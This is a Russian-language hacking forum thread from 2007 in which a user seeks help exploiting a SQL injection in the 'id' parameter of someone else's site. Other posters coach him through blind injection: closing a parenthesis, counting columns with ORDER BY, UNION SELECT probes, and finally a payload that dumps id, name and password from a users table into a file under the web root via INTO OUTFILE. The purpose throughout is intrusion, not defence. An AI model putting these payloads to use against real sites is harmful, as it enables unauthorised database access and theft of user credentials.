sql inj вслепую?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
sql inj вслепую? - 2007-09-19 08:15:44.736666
|
|
|
nunthrey
Сообщений: 4
Оценки: 0
Присоединился: 2007-09-19 07:52:25.186666
|
есть сайт со страницами вида:
http://site.com/index.html?id=32
( именно, что html). Ошибки отключены
В параметре id - sql-инъекция, т.к.
http://site.com/index.html?id=-1 or 1=1
работает
если поставить в конце комментарий, то не выводит ничего.
Как такое может быть? Подскажите, что дальше?
|
|
|
|
|
RE: sql inj вслепую? - 2007-09-19 10:19:53.396666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Называется blind SQL injection, слепая инъекция
Описана много раз
|
|
|
|
|
RE: sql inj вслепую? - 2007-09-19 12:52:52.053333
|
|
|
nunthrey
Сообщений: 4
Оценки: 0
Присоединился: 2007-09-19 07:52:25.186666
|
Эт я все читал. Теперь понял, что там скобку нужно закрыть.
Вот так подобрал количество столбцов:
http://site.com/index.html?id=32) order by 9–
А вот так не работает:
http://site.com/index.html?id=-1) union select null,null,null,null,null,null,null,null,null–
Теперь то что не так?
|
|
|
|
|
RE: sql inj вслепую? - 2007-09-19 16:57:56.733333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: nunthrey
А вот так не работает:
http://site.com/index.html?id=-1) union select null,null,null,null,null,null,null,null,null–
а ты что хочешь, чтобы тебе вывело? ) вместо null для начала подставь какие-нибудь более значящие значения(например 1,2,3,…)
|
|
|
|
|
RE: sql inj вслепую? - 2007-09-19 18:45:05.540000
|
|
|
nunthrey
Сообщений: 4
Оценки: 0
Присоединился: 2007-09-19 07:52:25.186666
|
quote:
ORIGINAL: Dimonelite
а ты что хочешь, чтобы тебе вывело? ) вместо null для начала подставь какие-нибудь более значящие значения(например 1,2,3,…)
Блин, ошибся.
Я вот так делал:
http://site.com/index.html?id=32) union select null,null,null,null,null,null,null,null,null–
Запрос по смыслу правильный и должен выводить то же самое, что и без юниона. Разве нет? Так вот он ничего не выводит…
|
|
|
|
|
RE: sql inj вслепую? - 2007-09-30 00:30:18.566666
|
|
|
muse
Сообщений: 112
Оценки: 0
Присоединился: 2005-06-09 00:40:48
|
нет.читай статьи внимательнее. blind sql injection это когда на странице не выводится результат. С этим нужно бороться с помощью outflite.
Тоесть когда подобрал кол-во столбцов и имя таблицы результат можно вывести в файт но для этого еще нужно знать полный путь к сайту
Например
http://site.ru/index.php?id=-99999+union+select+1,2,id,4,name,6,password,8,9,10,11,12,13+from+users+into+outfile+'/srv/www/site.ru/1.txt'
|
|
|
|
|
|
